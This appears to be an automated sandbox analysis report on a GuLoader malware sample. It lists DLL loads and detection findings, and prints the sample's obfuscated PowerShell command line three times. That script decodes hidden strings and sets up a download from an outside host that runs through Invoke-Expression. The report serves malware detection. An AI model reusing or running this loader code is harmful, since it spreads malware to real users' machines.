Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1637195965.0000000003126000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Core.pdbo source: powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ore.pdbi source: powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("Powershell.exe", "" <#Rastafarian Reservoiret spermatopho", "", "", "0");
Yara detected GuLoader
Source: Yara match File source: 00000004.00000002.1681623688.0000000009456000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1680885153.0000000008C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1661877856.000000000601E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1523751106.000001C4F4AC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64string($Bydelsforsget)$gloBAL:RatIOnAlisERe = [sYstEM.teXT.eNCODING]::Ascii.GeTstRING($kril)$GlObAl:sKrhOVedET=$raTIonALIserE.substring($staTuslINJEn,$nonCurREntLY)<#bearhound Kadmiumforgift
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Misanalyzed $diemagstrberiske $Meis), (Primitivest @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hustelefonnumrets = [AppDomain]::CurrentDomain.GetAssemb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Retrospektionen)), $Pie).DefineDynamicModule($Observing, $false).DefineType($Svarskrift, $Relevans, [System.MulticastDelegate])$Presti
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64string($Bydelsforsget)$gloBAL:RatIOnAlisERe = [sYstEM.teXT.eNCODING]::Ascii.GeTstRING($kril)$GlObAl:sKrhOVedET=$raTIonALIserE.substring($staTuslINJEn,$nonCurREntLY)<#bearhound Kadmiumforgift
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 11_2_004044A4
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_04C235F7 push eax; retn 07B5h 4_2_04C23639
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_20902806 push ecx; ret 7_2_20902819
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0044693D push ecx; ret 11_2_0044694D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 11_2_00451D54 push eax; ret 11_2_00451D61
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00451D34 push eax; ret 12_2_00451D41
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_00444E71 push ecx; ret 12_2_00444E81
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00414060 push eax; ret 13_2_00414074
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00414060 push eax; ret 13_2_0041409C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00414039 push ecx; ret 13_2_00414049
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_004164EB push 0000006Ah; retf 13_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00416553 push 0000006Ah; retf 13_2_004165C4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 13_2_00416555 push 0000006Ah; retf 13_2_004165C4
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 12_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 12_2_004047CB
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
